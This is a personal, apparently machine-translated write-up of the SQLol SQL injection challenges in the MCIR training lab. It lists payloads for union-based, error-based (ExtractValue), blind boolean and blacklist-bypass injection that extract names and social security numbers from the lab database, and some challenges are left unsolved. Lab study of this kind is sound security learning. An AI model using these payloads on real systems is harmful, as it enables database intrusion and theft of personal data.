Injection learning records in MCIR

Injection learning records in MCIR

Environment: xampp-win32-5.6.3-0-VC11 mcir

Preface

Mcir is also one of the top ten, but how does one feel that no one has written such information about it? This is really hard for a newbie to learn this system, and it is very difficult to... I plan to study and sort out documents in two days. But one day has passed, and I am still scratching my head. I feel like the whole person is not good when I use my time and what I actually do. Ah, the Yali is so big !!!

Finally, I found the video on youtube and read it a little. I guess it feels like the video address is Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley.

Yan GUI Zheng earned

Preparation

First, change the database link password in the Program (if the integrated environment xampp is used, set the password to null ).

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

Start

On the homepage, select SQLol to go to the page.

| INSERT || UPDATE || DELETE || SELECT || Custom || Challenges | 

Select Challenges. The following figure is displayed:

Based on his challenge level, we have one challenge.

Challenge 0

This is simple and requires all user name information:

Your objective is to get the query to return all usernames instead of just one.

If the prompt is 'struct', use the following statement and obtain the result:

Of course, in addition to 'or '1' = '1, we can also use the '=' injection method provided by the official video.

Challenge 1

In challenge 1, the requirements are as follows:

Your objective is to find the table of social security numbers present in the database and extract its information.

You need to find the table. My practice is as follows:

Order by guessed the length of the result set field: 1 and then get the user connection, database version. The statement is as follows:

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) # 

Result: root @ localhost: sqlol: 5.6.21

Then we guess the table in sqlol:

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C # 

Get two tables: ssn and users.

 

We need to get the social security numbers, and then look at the two tables. We know it should be the ssn table. Well, we can get all the fields in the ssn table.

 

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E # 

Two fields are obtained: name and ssn.

Then the field value is displayed.

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn # 

The obtained information is as follows:

Challenge 2-The Failure of Quote Filters

In Challenge 2, the requirements are exactly the same. Directly copy the last statement above. Sorry, an error is reported. Check the description of the challenge carefully:

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

Honestly, I looked at it and found that the web application filtered out single quotes. So we can try to remove single quotes:

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn # 

The result is as follows:

Challenge 3-Death Row

The challenges are described as follows:

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query. 

It means that the request is the same as the challenge one, but the result is no longer all Row Records, but only one row is returned at a time.

For such a type, the statements we construct are as follows:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 # ' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #... 

Challenge 4-War on Error

See the description:

In this challenge, no output from the query is shown, but verbose errors are shown.Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

This indicates that the query result cannot be displayed. You need to construct a statement to display the error. (The error message must be displayed here)

The constructor statement is as follows:

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a... 

 

Challenge 5-Blind Luck

See the description:

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

This indicates that the error message is disabled and injection is performed under blind injection.

For this injection, the result will return a boolean type. During the construction, we need to construct a judgment statement ??? And must use or ???

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 # ' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 # 

Challenge 6-Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.Your objective is to create a new table called "ipwntyourdb" using stacked queries.

Challenge 6 is stack query, but php does not support it. Please refer to the description here: SQL: Does php + mysql support stacked query (stack query?

And this challenge does not seem to be realized ----

Challenge 7-Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown.Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

... The delete injection vulnerability is unknown.

Challenge 8-Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.Your objective is to find the table of social security numbers present in the database and extract its information.

The default blacklist filter can be bypassed. The injection statement is as follows:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username=' 

Challenge 9-Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3. 

Not implemented -----